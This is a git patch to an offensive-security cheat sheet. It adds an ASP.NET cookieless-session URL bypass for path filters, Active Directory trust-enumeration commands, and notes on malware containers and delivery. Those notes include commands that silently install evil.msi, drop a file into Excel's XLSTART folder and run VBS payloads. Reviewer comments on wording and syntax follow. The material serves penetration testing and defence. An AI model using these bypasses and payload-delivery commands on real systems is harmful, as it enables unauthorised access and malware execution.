From 7752ff806f6902f0817f1d39c158e85cd4ed8892 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Sat, 2 Sep 2023 23:01:10 +0200 Subject: [PATCH] ASPNET Cookieless Bypass --- Directory Traversal/README.md | 20 ++++++++ .../Active Directory Attack.md | 27 ++++++----- Methodology and Resources/Initial Access.md | 46 +++++++++++++++++-- 3 files changed, 77 insertions(+), 16 deletions(-) diff --git a/Directory Traversal/README.md b/Directory Traversal/README.md index 5fa1140..2fb50a7 100644 --- a/Directory Traversal/README.md +++ b/Directory Traversal/README.md @@ -13,6 +13,7 @@ * [Double URL encoding](#double-url-encoding) * [UNC Bypass](#unc-bypass) * [NGINX/ALB Bypass](#nginxalb-bypass) + * [ASPNET Cookieless Bypass](#aspnet-cookieless-bypass) * [Path Traversal](#path-traversal) * [Interesting Linux files](#interesting-linux-files) * [Interesting Windows files](#interesting-windows-files) @@ -72,6 +73,7 @@ Sometimes you encounter a WAF which remove the "../" characters from the strings http://domain.tld/page.jsp?include=..;/..;/sensitive.txt ``` + ### Double URL encoding ```powershell @@ -82,6 +84,7 @@ http://domain.tld/page.jsp?include=..;/..;/sensitive.txt **e.g:** Spring MVC Directory Traversal Vulnerability (CVE-2018-1271) with `http://localhost:8080/spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini` + ### UNC Bypass An attacker can inject a Windows UNC share ('\\UNC\share\name') into a software system to potentially redirect access to an unintended location or arbitrary file. @@ -90,6 +93,7 @@ An attacker can inject a Windows UNC share ('\\UNC\share\name') into a software \\localhost\c$\windows\win.ini ``` + ### NGINX/ALB Bypass NGINX in certain configurations and ALB can block traversal attacks in the route, For example: 
@@ -99,6 +103,21 @@ To bypass this behaviour just add forward slashes in front of the url: ```http://nginx-server////////../../``` +### ASPNET Cookieless Bypass + +When cookieless session state is enabled. Instead of relying on a cookie to identify the session, ASP.NET modifies the URL by embedding the Session ID directly into it. + +For example, a typical URL might be transformed from: `http://example.com/page.aspx` to something like: `http://example.com/(S(lit3py55t21z5v55vlm25s55))/page.aspx`. The value within `(S(...))` is the Session ID. + +We can use this behavior to bypass filtered URLs. + +```powershell +/admin/(S(X))/main.aspx +/admin/Foobar/(S(X))/../(S(X))/main.aspx +/(S(X))/admin/(S(X))/main.aspx +``` + + ### Java Bypass Bypass Java's URL protocol @@ -210,3 +229,4 @@ The following log files are controllable and can be included with an evil payloa * [CWE-40: Path Traversal: '\\UNC\share\name\' (Windows UNC Share) - CWE Mitre - December 27, 2018](https://cwe.mitre.org/data/definitions/40.html) * [NGINX may be protecting your applications from traversal attacks without you even knowing](https://medium.com/appsflyer/nginx-may-be-protecting-your-applications-from-traversal-attacks-without-you-even-knowing-b08f882fd43d?source=friends_link&sk=e9ddbadd61576f941be97e111e953381) * [Directory traversal - Portswigger](https://portswigger.net/web-security/file-path-traversal) +* [Cookieless ASPNET - Soroush Dalili](https://twitter.com/irsdl/status/1640390106312835072) \ No newline at end of file diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 6c141f4..97ea2d8 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md 
@@ -3422,19 +3422,22 @@ $obj.Application.ShellExecute("cmd.exe","/c calc.exe","C:\windows\system32",$nul ### Enumerate trusts between domains -```powershell -nltest /trusted_domains -``` +* Native `nltest` + ```powershell + nltest /trusted_domains + ``` +* PowerShell `GetAllTrustRelationships` + ```powershell + ([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships() -or - -```powershell -([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships() - -SourceName TargetName TrustType TrustDirection ----------- ---------- --------- -------------- -domainA.local domainB.local TreeRoot Bidirectional -``` + SourceName TargetName TrustType TrustDirection + ---------- ---------- --------- -------------- + domainA.local domainB.local TreeRoot Bidirectional + ``` +* Crackmapexec module `enum_trusts` + ```powershell + cme ldap -u -p -M enum_trusts + ``` ### Exploit trusts between domains diff --git a/Methodology and Resources/Initial Access.md b/Methodology and Resources/Initial Access.md index 32c9916..90a519e 100644 --- a/Methodology and Resources/Initial Access.md +++ b/Methodology and Resources/Initial Access.md @@ -5,7 +5,8 @@ ## Summary * [Complex Chains](#complex-chains) -* [Payloads](#payloads) +* [Container](#container) +* [Payload](#payload) * [Binary Files](#binary-files) * [Code Execution Files](#code-execution-files) * [Embedded Files](#embedded-files) 
@@ -29,8 +30,31 @@ * **DECOY**: used to continue pretext narration after detonating malware * Typically open PDF files +Examples: +* HTML SMUGGLING(PASSWORD PROTECTED ZIP + ISO(LNK + IcedID + PNG)) used by [TA551/Storm-0303](https://thedfirreport.com/2023/08/28/html-smuggling-leads-to-domain-wide-ransomware/) -## Payloads + +## Container + +* **ISO/IMG** - can contain hidden files, gets **automounted** giving easy access to contained files (`powershell –c .\malware.exe`) +* **ZIP** - can contain hidden files (locate ZIP + unpack it + change dir + run Malware) +* **WIM** - Windows Image, builtin format used to deploy system features + ```ps1 + # Mount/Unmount .WIM + PS> Mount-WindowsImage -ImagePath myarchive.wim -Path "C:\output\path\to\extract" -Index 1 + PS> Dismount-WindowsImage -Path "C:\output\path\to\extract" -Discard + ``` +* **7-zip, RAR, GZ** - should get a native support on Windows 11 + + +## Trigger + +* **LNK** +* **CHM** +* **ClickOnce** + + +## Payload ### Binary Files @@ -106,10 +130,23 @@ These files can be executed directly on the system without any third party. * Word with Macro (.doc, .docm) * Excel library (.xll) * Excel macro-enabled add-in file (.xlam) + ```ps1 + xcopy /Q/R/S/Y/H/G/I evil.ini %APPDATA%\Microsoft\Excel\XLSTART + ``` * WSF files (.wsf) * MSI installers (.msi) + ```ps1 + powershell Unblock-File evil.msi; msiexec /q /i .\evil.msi + ``` * MSIX/APPX app package (.msix, .appx) -* ClickOnce (.application, .vsto) +* ClickOnce (.application, .vsto, .appref-ms) +* Powershell scripts (.ps1) +* Windows Script Host scripts (.wsh, .vbs) + ```ps1 + cscript.exe payload.vbs + wscript payload.vbs + wscript /e:VBScript payload.txt + ``` ### Embedded Files 
@@ -148,5 +185,6 @@ In 2022, LAPSUS$ claimed responsibility for a cyberattack on NVIDIA, a major gra * [Top 10 Payloads: Highlighting Notable and Trending Techniques - delivr.to](https://blog.delivr.to/delivr-tos-top-10-payloads-highlighting-notable-and-trending-techniques-fb5e9fdd9356) * [Executing Code as a Control Panel Item through an Exported Cplapplet Function - @spotheplanet](https://www.ired.team/offensive-security/code-execution/executing-code-in-control-panel-item-through-an-exported-cplapplet-function) -* [02. Desperate Infection Chains - Multi-Step Initial Access Strategies by Mariusz Banach](https://youtu.be/CwNPP_Xfrts) +* [Desperate Infection Chains - Multi-Step Initial Access Strategies by Mariusz Banach - x33fcon Youtube](https://youtu.be/CwNPP_Xfrts) +* [Desperate Infection Chains - Multi-Step Initial Access Strategies by Mariusz Banach - x33fcon PDF](https://binary-offensive.com/files/x33fcon%20-%20Desperate%20Infection%20Chains.pdf) * [Red Macros Factory - https://binary-offensive.com/](https://binary-offensive.com/initial-access-framework) \ No newline at end of file
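Review bot: the new "ASPNET Cookieless Bypass" section in `Directory Traversal/README.md` (hunk `@@ -99,6 +103,21`) opens with a sentence fragment, "When cookieless session state is enabled. Instead of relying on a cookie to identify the session, ASP.NET modifies the URL…"; merge the two into one sentence, for example "When cookieless session state is enabled, ASP.NET embeds the Session ID in the URL instead of relying on a cookie." The section also says "We can use this behavior to bypass filtered URLs" without saying what is doing the filtering; a short line stating that the bypass works when a component in front of the application (WAF, reverse proxy, path-based ACL) matches on the literal path while ASP.NET treats the `(S(X))` segment differently would make the three examples self-explanatory, and a pointer to the defensive counterpart (disabling cookieless sessions, or normalising paths in the filter the same way the application does) would give readers the other half of the picture.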
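Review bot: the reference hunk in `Directory Traversal/README.md` (`@@ -210,3 +229,4`) leaves the file without a trailing newline ("\ No newline at end of file"); add one so the next reference appended here does not produce a noisy diff on a line nobody changed.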
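Review bot: in the `Active Directory Attack.md` hunk (`@@ -3422,19 +3422,22`) the new Crackmapexec line `cme ldap -u -p -M enum_trusts` is not a valid invocation: `-u` and `-p` have no values and the target host is missing, so it fails to parse when copied. Use explicit placeholders such as `cme ldap <dc-ip> -u <user> -p <password> -M enum_trusts`. The fence for that block is also tagged `powershell` although `cme` is run from a Linux shell; tag it `bash` (or leave it untagged) so syntax highlighting and readers are not misled. Lastly, the `GetAllTrustRelationships` bullet keeps the sample output inside the same fence as the command, which is fine, but a one-line comment (`# sample output`) above the `SourceName` header would make clear where the command ends and the output begins.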
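Review bot: the Summary hunk in `Initial Access.md` (`@@ -5,7 +5,8`) adds `* [Container](#container)` and renames `Payloads` to `Payload`, but the `## Trigger` heading introduced later in this same patch is not listed; add `* [Trigger](#trigger)` between the Container and Payload entries so the table of contents matches the document. Since the heading was renamed, also check that no other file links to the old `#payloads` anchor.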
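Review bot: in the Container hunk of `Initial Access.md` (`@@ -29,8 +30,31`) the inline example `powershell –c .\malware.exe` uses a Unicode en dash rather than an ASCII hyphen before `c`, so the text does not read as the intended flag when copied; replace it with `-c`. The new `## Trigger` section consists of three bare bullets (`LNK`, `CHM`, `ClickOnce`) with no description or reference, unlike every other list in this file; either give each a one-line explanation of why it belongs in the chain, or add a reference to the relevant section below (ClickOnce is already covered under Code Execution Files). Minor wording: "should get a native support on Windows 11" reads better as "should get native support on Windows 11".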
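Review bot: in the Code Execution Files hunk of `Initial Access.md` (`@@ -106,10 +130,23`) the `xcopy` snippet placed under the "Excel macro-enabled add-in file (.xlam)" bullet copies `evil.ini`, which does not match the bullet it illustrates; either rename the sample file to the extension the bullet is about or move the snippet to where it belongs, and say in a comment what the `XLSTART` folder does for the reader who has not seen it. The three new snippets are fenced as `ps1` but `xcopy … %APPDATA%\…` is cmd syntax (the `%VAR%` form is not expanded by PowerShell), and `cscript.exe`/`wscript` are shell-agnostic; tag each fence with the shell the command is actually meant for so copy-paste behaviour matches the label.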
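Review bot: the reference hunk in `Initial Access.md` (`@@ -148,5 +185,6`) spells the platform "Youtube" in the first new entry; the proper noun is "YouTube". The file is also left without a trailing newline ("\ No newline at end of file"), the same issue as in the Directory Traversal README in this patch; add a final newline to both.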